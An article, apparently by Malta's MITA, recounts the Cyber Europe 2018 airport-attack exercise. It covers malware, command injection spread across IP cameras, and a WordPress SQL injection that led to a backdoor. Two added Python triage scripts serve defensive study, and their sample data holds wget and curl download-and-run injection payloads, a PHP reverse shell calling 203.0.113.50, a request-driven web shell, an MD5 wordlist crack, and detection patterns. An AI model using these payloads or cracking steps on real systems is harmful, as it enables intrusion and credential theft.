Get prepared for the next cyber
It is a normal day at the airport. Suddenly, the automated check-in machines display a system failure. Travel apps stop working and the agents at the check-in counters cannot operate their computers. Travellers can neither check in their luggage nor pass through security. Huge queues start to form while the airport monitors show that all flights have been cancelled. Baggage cannot be claimed and more than half of the flights cannot take off.
A radical group has hacked the airport’s critical systems using digital and hybrid attacks. They have claimed responsibility for the attack and are using their channels to incite more people to adopt their radical ideology.
This was the scenario that over 900 European cybersecurity specialists from 30 countries had to face on 6th and 7th June, during Cyber Europe 2018, the international cybersecurity simulation exercise organised by ENISA. MITA was part of the Maltese team. In Malta, 50 local cyber security and media professionals from 11 organisations took part, coordinated by the Critical Infrastructure Protection Directorate and Malta’s National Computer Security Incident Response Team (CSIRTMalta).
The Maltese team was organised in multiple cells at various locations. The national coordinating cell, which included a media crisis cell, was located at the Ministry for Home Affairs and National Security, while an operational crisis cell gathered at MITA’s Data Centre. Another cell was established at Malta International Airport, from where both Air Malta and the airport teams coordinated their work.
To prepare for the event, MITA set up a laboratory of five machines: two physical Windows test machines, two physical Linux test machines and one Linux virtual machine. The machines were equipped with forensic and malware analysis tools and were connected to a segregated network.
Many technical lessons learnt
One of the incidents the team handled successfully was an executable file that could easily have been sent to potential victims by email or downloaded from a rogue website. It was malware acting as a dropper, keylogger and exfiltrator. The keylogger captured keystrokes, up to 10,000 of them on the infected machine, through which the attacker could harvest sensitive information such as passwords and credit card numbers. The malware also exfiltrated files located on the victims’ desktops through POST requests to a range of URLs. An updated version released later added persistence mechanisms and anti-forensic techniques in order to stay undetected. That version was harder to analyse, since only specific tools could be used on it.
As part of the simulation, a cyber-attack was also launched against the airport’s IP cameras. The team was given a packet capture of the traffic generated by the cameras for analysis. From it, the team could see that an infected camera inside the closed network had tried to infect the other cameras through a command injection vulnerability in their web interface. Exploiting that vulnerability installed the same version of the malware on each target device. The malware infected all of the airport’s IP cameras and bricked them, leaving the airport blind to any physical attack.
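The two findings above (a workstation exfiltrating desktop files to a spread of URLs, and a camera pushing shell commands into its neighbours’ web interfaces) both start from the same artefact: the HTTP requests reconstructed from a capture. As an added example, not the MITA team’s tooling or any exercise artefact, the Python script below runs both checks over one list of requests. It assumes the requests have already been reassembled from the pcap (for instance with tshark) into (source IP, method, URL, body) tuples; the sample traffic, IP addresses, endpoint names, file names and injected command strings are all constructed for the example.

```python
"""Triage of HTTP requests reconstructed from a packet capture.

Added example, not the exercise's or the MITA team's tooling.  Input is a
list of (source_ip, method, url, body) tuples, assumed to have been pulled
out of the pcap beforehand (e.g. with tshark).  All records below are
constructed sample data.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample traffic (not exercise data).
SAMPLE_REQUESTS = [
    # A workstation sending desktop files to several collection points.
    ("10.20.1.15", "POST", "http://203.0.113.10/upload.php",
     'Content-Disposition: form-data; name="f"; filename="passwords.xlsx"\r\n\r\nPK...'),
    ("10.20.1.15", "POST", "http://203.0.113.11/u/",
     'Content-Disposition: form-data; name="f"; filename="boarding.pdf"\r\n\r\n%PDF...'),
    ("10.20.1.15", "POST", "http://203.0.113.12/api/v1/put",
     'Content-Disposition: form-data; name="f"; filename="keys.log"\r\n\r\n[12:01] ...'),
    # Ordinary intranet use from another workstation.
    ("10.20.1.16", "GET", "http://intranet.example/news", ""),
    ("10.20.1.16", "POST", "http://intranet.example/login", "user=alice&pass=Secret1"),
    # An infected camera probing two neighbours' CGI endpoints.
    ("10.30.0.21", "GET",
     "http://10.30.0.22/cgi-bin/ping.cgi?ip=127.0.0.1;wget+http://10.30.0.21/m+-O+/tmp/m;sh+/tmp/m",
     ""),
    ("10.30.0.21", "POST", "http://10.30.0.23/cgi-bin/set_ntp.cgi",
     "server=`curl 10.30.0.21/m|sh`"),
    # The legitimate camera management host using the same endpoint.
    ("10.30.0.1", "GET", "http://10.30.0.22/cgi-bin/ping.cgi?ip=10.30.0.1", ""),
]

# A multipart file part announces its original name in Content-Disposition.
FILENAME_RE = re.compile(r'filename="([^"]+)"')

# A shell metacharacter (or "$(") followed by a fetch-or-run command: the
# usual shape of a command-injection payload aimed at an embedded web UI.
INJECTION_RE = re.compile(
    r"(?:[;&|`\n]|\$\()\s*(?:wget|curl|tftp|sh|bash|busybox|nc|chmod|rm|telnetd)\b"
)


def _params(encoded):
    """Split a form-urlencoded string into a dict.

    Done by hand rather than with parse_qs so that ';' inside a value is never
    treated as a separator (older Pythons did that) and survives for the check.
    """
    out = {}
    for pair in encoded.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[unquote_plus(key)] = unquote_plus(value)
    return out


def find_exfiltration(requests, min_hosts=2):
    """Return sources that POST named files to at least min_hosts distinct hosts."""
    seen = defaultdict(lambda: {"hosts": set(), "files": []})
    for src, method, url, body in requests:
        if method != "POST":
            continue
        for name in FILENAME_RE.findall(body):
            seen[src]["hosts"].add(urlsplit(url).netloc)
            seen[src]["files"].append(name)
    return {
        src: {"hosts": sorted(rec["hosts"]), "files": rec["files"]}
        for src, rec in seen.items()
        if len(rec["hosts"]) >= min_hosts
    }


def find_command_injection(requests):
    """Return (src, target_host, path, param, value) for every injected parameter."""
    hits = []
    for src, method, url, body in requests:
        parts = urlsplit(url)
        params = _params(parts.query)
        if body and "form-data" not in body:  # multipart uploads are not param lists
            params.update(_params(body))
        for name, value in params.items():
            if INJECTION_RE.search(value):
                hits.append((src, parts.netloc, parts.path, name, value))
    return hits


def spread_map(hits):
    """Map each injecting source to the sorted list of hosts it targeted."""
    targets = defaultdict(set)
    for src, host, *_ in hits:
        targets[src].add(host)
    return {src: sorted(hosts) for src, hosts in targets.items()}


if __name__ == "__main__":
    for src, rec in find_exfiltration(SAMPLE_REQUESTS).items():
        print(f"exfil from {src}: {rec['files']} -> {rec['hosts']}")
    hits = find_command_injection(SAMPLE_REQUESTS)
    for src, host, path, name, value in hits:
        print(f"injection {src} -> {host}{path} [{name}] {value!r}")
    print("spread:", spread_map(hits))
```

On the sample data the first check singles out 10.20.1.15 (three named files to three hosts) and the second attributes both injected parameters to 10.30.0.21, with `spread_map` giving the list of cameras it tried to reach, which is the lateral-movement picture the team reconstructed. The injection pattern is deliberately narrow (metacharacter plus a download or execution command) so that legitimate values containing a lone semicolon do not flood the output; for a real capture one would also correlate the hits with subsequent outbound fetches from each target camera to confirm which injections succeeded.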
Another incident involved an internal WordPress site, for which the team was given an image of the virtual machine hosting it. The attack used a WordPress SQL injection vulnerability to retrieve the usernames and password hashes of all users. With tools such as WPScan the attacker could easily identify which accounts had the Administrator role. The passwords were stored hashed with a weak algorithm, so the attacker cracked them, logged into the administration section with an Administrator account and opened a back-door on the site. The backdoor the team examined was a PHP reverse shell inserted into one of the files of the WordPress theme. We also found that the attacker had recreated the client-side exploit dynamically from stored images.
Other incidents handled included ransomware in airport automation systems and ticketing kiosks, DLL injection on electricity control systems, malicious drone navigation apps, office hacking via smart devices and Memcached DDoS attacks.
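As an added example of the two checks the WordPress incident calls for (this is not the team’s tooling and not WordPress code), the Python script below classifies the password hashes pulled from wp_users, shows how quickly an unsalted MD5 hash falls to a small wordlist, and scans theme files for the markers a PHP reverse shell or parameter-driven web shell leaves behind. The user rows, hashes, wordlist, theme file contents, the 203.0.113.50 address and the indicator patterns are all constructed for the example.

```python
"""Triage of a compromised WordPress site image.

Added example, not the team's tooling.  The user rows, wordlist and theme
files are constructed.  Two checks from the incident: how an unsalted MD5
password hash falls to a wordlist, and how to find the PHP reverse shell or
web shell an attacker drops into a theme file.
"""
import hashlib
import re

# Constructed wp_users rows as (user_login, user_pass).  WordPress normally
# stores phpass ("$P$") or bcrypt ("$2y$") hashes; a bare 32-hex value is a
# legacy unsalted MD5 that was never upgraded.
USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),      # md5("password")
    ("kiosk", hashlib.md5(b"Kiosk!9x2").hexdigest()),   # md5, not in the wordlist
    ("editor", "$P$BH6ZxtYgP2Zi6E0fK1w5qzj1jcFm7c0"),   # phpass (constructed)
    ("ops", "$2y$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy"),  # bcrypt (constructed)
]

WORDLIST = ["123456", "password", "airport", "malta2018", "admin"]

# Constructed theme files: one clean, one reverse shell, one web shell.
THEME_FILES = {
    "functions.php": (
        "<?php\n"
        "add_action('init', 'theme_setup');\n"
        "function theme_setup() { register_nav_menus(array('main' => 'Main')); }\n"
    ),
    "404.php": (
        "<?php\n"
        "$sock = fsockopen('203.0.113.50', 4444);\n"
        "$proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);\n"
    ),
    "header.php": (
        "<?php if (isset($_GET['c'])) { system($_GET['c']); } ?>\n"
        "<html><head><title>Airport intranet</title></head>\n"
    ),
}

# Indicator patterns (constructed for the example): a socket opened next to a
# process spawn, an eval over a decoder, or a shell call fed from a request.
INDICATORS = [
    ("reverse-shell", re.compile(
        r"fsockopen\s*\(.*?\b(?:proc_open|popen|shell_exec|exec|system)\s*\(", re.S)),
    ("obfuscated-eval", re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("webshell-param", re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
]


def classify_hash(user_pass):
    """Name the hash scheme of a wp_users.user_pass value."""
    if re.fullmatch(r"[0-9a-f]{32}", user_pass):
        return "md5-unsalted"
    if user_pass.startswith(("$P$", "$H$")):
        return "phpass"
    if user_pass.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    return "unknown"


def crack_unsalted_md5(users, wordlist):
    """For each unsalted-MD5 user, return the matching wordlist entry (or None).

    No salt and no work factor means one hash per word for the whole user
    table, which is why a weak scheme makes the cracking step trivial.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {
        login: lookup.get(h)
        for login, h in users
        if classify_hash(h) == "md5-unsalted"
    }


def scan_theme(files):
    """Return {filename: [indicator names]} for theme files showing backdoor markers."""
    findings = {}
    for name, source in files.items():
        matched = [label for label, rx in INDICATORS if rx.search(source)]
        if matched:
            findings[name] = matched
    return findings


if __name__ == "__main__":
    for login, h in USERS:
        print(f"{login}: {classify_hash(h)}")
    print("cracked:", crack_unsalted_md5(USERS, WORDLIST))
    print("backdoors:", scan_theme(THEME_FILES))
```

On the constructed data the admin hash is recovered from the wordlist, the kiosk hash is not, and the phpass and bcrypt rows are never attempted; the scan flags 404.php as a reverse shell and header.php as a web shell while leaving functions.php alone. On a real image one would also diff each theme file against a clean copy of the same theme version, since a backdoored 404.php stands out immediately against the vendor’s original even when it evades the patterns above.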
It was a great experience from which we have improved as a team not only from a technical perspective, but also in the cooperation between the public and private sectors, where we were able to share knowledge and les-